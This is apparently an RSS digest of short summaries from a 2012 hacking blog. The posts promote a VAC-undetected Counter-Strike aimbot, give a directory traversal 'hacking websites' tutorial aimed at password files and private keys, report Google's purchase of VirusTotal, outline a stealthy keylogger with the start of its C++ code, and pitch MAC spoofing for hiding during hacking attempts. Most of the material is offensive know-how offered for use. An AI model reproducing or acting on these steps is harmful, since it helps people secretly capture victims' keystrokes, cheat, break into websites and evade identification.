R-aimbot D3D Mode aimbot Hack for Counter Strike 1.6 VAC Undetected

noreply@blogger.com (Lokesh Singh) — Mon, 08 Oct 2012 08:40:02 PDT

Hey friends, R-Aimbot is the latest aimbot hack for Counter strike 1.6 in the market. R-Aimbot is undetected by VAC and works perfectly well on Wndows 7 32bit / Windows 64 bit / Windows XP. We know most of the hacks requires OPENGL mode for working, but cool news is that R-Aimbot Aimbot hack for Counter Strike 1.6 works for all three modes D3D mode (Direct X mode), Software mode and OpenGL mode. Its a clean and perfect aimbot hack that works with D3D mode on Windows 7 64 bit. Counter Strike 1.6 Aimbot Hack Some Cool Features of R-aimbot Aimbot Hack: Aimbot AutoAim KnifeAim AutoWall AutoShoot AutoPistol Team NoRecoil NoSpread Support : Counter-Strike 1.6 (4554) Windows XP/Vista/7 x32 & x64 How to use the R-aimbot aimbot Hack ? 1. Start the R-aimbot.exe file by double click on it. 2. Start Counter strike hl.exe . 3. Enjoy the game :P. Download R-aimbot Aimbot Hack : Download If you have any issues ask us in form of comments.

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Hacking websites using Directory Traversal Attacks | Hackingloops

noreply@blogger.com (Lokesh Singh) — Fri, 14 Sep 2012 11:47:43 PDT

Hacking websites, nowadays has became little bit difficult as developers nowadays are also focusing on OWASP(Open web application security project) top 10 vulnerabilities which hackers normally use to hack websites. Today Hackingloops has came with tutorial on Directory Traversal Attacks (part of top 10 vulnerabilities). So friends lets start our tutorial on Hacking websites using Directory traversal attacks. Directory is basically a folder where web designer stores his website files( this is with respect to server). By directory traversal attack, i simply mean that hacker is able to navigate between the directories and files stored in those directories(say root which contains all config files, htaccess file, ini file and xquery files(all these files are most sensible files for any website, if any of these files security is not handled properly, then Hacker can own website)). In short by using directory traversal attack, hackers main aim is to get access to sensible file that i have mentioned above. Nowadays attackers also use directory traversal attacks to view arbitrary files on web server like SSL private keys and password files. Directory traversal is also known as the ../ (dot dot slash) attack, directory climbing, and backtracking. What does ../ or ..\ (dot dot slash) mean ? The ..\ instructs the system to go one directory(or simply called folder) up. For example, we are at this location C:\Hacking\Hacking Tools\Bugtraq. Now on typing ..\ , we would reach at C:\Hacking\Hacking Tools. Again on typing ..\ , we would reach at C:\Hacking and so on. Lets again go at location C:\Hacking\Hacking Tools\Bugtraq. Now suppose we want to access a file abcfile.txt placed in folder Hacking. Just we need to type ..\..\abcfile.txt . Typing ..\ two times would take us two directories up (that is to directory Hacking) where abcfile.txt is stored. I hope you got dot dot slash concept. Now lets proceed further.. So as...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Google buys Virustotal to enhance Security

noreply@blogger.com (Lokesh Singh) — Sat, 08 Sep 2012 07:37:12 PDT

Well, don't get shocked but its a truth. Google has bought online malware-scanning firm VirusTotal and is pledging to keep the service open to support security software vendors. It would probably going to be one of the biggest setback to hackers. Because now Google is set to come in security field. Virustotal is one of the biggest online malware scanning website and now its a part of Google. Google buys VirusTotal to enhance security "We've worked hard to ensure that the services we offer continually improve. But as a small, resource-constrained company, that can sometimes be challenging," the security firm said in its "Inside VirusTotal's Pants" blog. "So we're delighted that Google, a long-time partner, has acquired VirusTotal. This is great news for you, and bad news for malware generators." VirusTotal was set up in 2007 and uses over 40 different antivirus engines to scan files and URLs for malware for free. Users can upload small files for checking, or just input a URL, to see if it's on a blacklist, and VirusTotal shares its results with other security vendors to allow them to beef up their defenses. The computer security industry is unusual in that its members share some of its most valuable data malware signatures with competitors. This ensures that new malware is tramped down quickly and the rising tide of security raises all boats. Even Microsoft shares its data, so Google's confirmation is a good sign for the industry. Google didn't say how much it is spending to purchase VirusTotal, but it has pledged that it will continue to share information from the service with other vendors. It's not saying how it will be integrating the VirusTotal technology, but safer searching and better malware security for its Apps platform look the most likely bets. "Security is incredibly important to our users and we've invested many millions of dollars to help keep them safe online," a Google spokeswoman told El Reg. "VirusTotal also...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

How to code keylogger in C programming Language

noreply@blogger.com (Lokesh Singh) — Sat, 01 Sep 2012 18:22:48 PDT

How to code keylogger in C programming language : C codechamp has brought you a detailed tutorial on how to write a Keylogger code in C programming. C program of Keylogger or keystroke logger : Keylogger is a computer program which captures all the key strokes pressed by user in real time. It captures all the keys and write them to some file say log.txt and stores it on computer hard disk. Now sending these logs to emails or FTP address depends upon the type of keylogger that is keylogger is remote keylogger or physical keylogger. Physical keyloggers are useful when you have physical access to that system and can retrieve logs personally. While remote keyloggers can be used from anywhere in the world, the only requirement is that victim must have internet connection. Today we will be writing a C program of Physical keylogger or Keystroke logger which requires physical access of the system. We will be extending our logic in further programs to make it remote keylogger which sends logs to FTP’s and Emails directly. So first of all lets see how simple keylogger program works… C program of Keylogger or Keystroke logger Algorithm for writing a Simple Keylogger : 1. Create an Empty log file for storing keylogs. 2. Intercept keys pressed by user using GetAsyncKeyState() function. 3. Store these intercepted values in file. 4. Hide the Running Window Dialog to make it undetectable. 5. Use while loop to make it running in all conditions. 6. Add Sleep() function to reduce the CPU usage to 0%. Now let us see the C program of keylogger or keystroke logger which intercepts all the keys pressed by the user and store these pressed keys in log file. C program of Keylogger or keystroke logger : #include<iostream> #include<windows.h> #include<fstream> #include<time.h> using namespace std; int main() { bool runlogger = true; ofstream log; //where your logs will be stored ...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

How to spoof Mac Address using C Program

noreply@blogger.com (Lokesh Singh) — Sat, 01 Sep 2012 18:23:50 PDT

Hey friends, welcome back ! In my previous articles about how to spoof a Mac address, i have shown you how to change or spoof your Mac address or Physical Address manually by making registry changes. Its a very hectic process, going to registry, then finding the registry keys and then changing it. To bypass all this hectic process, i have written a C program which will retrieve the list of all the network adapters along with serial and parallel mini ports. Then it will prompt you to select the device whose Mac address or Physical address you want to change and then it will ask you the new Mac address with which you want to spoof your Mac address. Thats all ! I hope you all might be under impression that how can someone change or spoof the Mac address or Physical address. Let us discuss it in detail ... Change or Spoof Mac address Mac Address or Physical Address: The MAC address uniquely identifies the network card within the current network segment. It consists of a vendor id that is unique among all network vendors, and a relative id that is unique to the vendor. The address is hard-coded onto the network adapter. But since most of the drivers were developed with the Windows Driver Development kit, the MAC address is read from the Windows registry, when the card is initialized. Now when you are launching any hacking attempt your MAC address is registered at your ISP that your physical address has accessed the particular website and you can be easily identified as MAC address is always unique. Actually overall concept is that : Our windows operating system adds an extra layer of device conventions with the help of registry and then whenever some tool or website tries to inquire your physical address it picks it from registry. So in reality your device's physical address or Mac address will remain same and unique but Device's Physical address or Mac address at windows user level will be spoofed or changed. The below...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]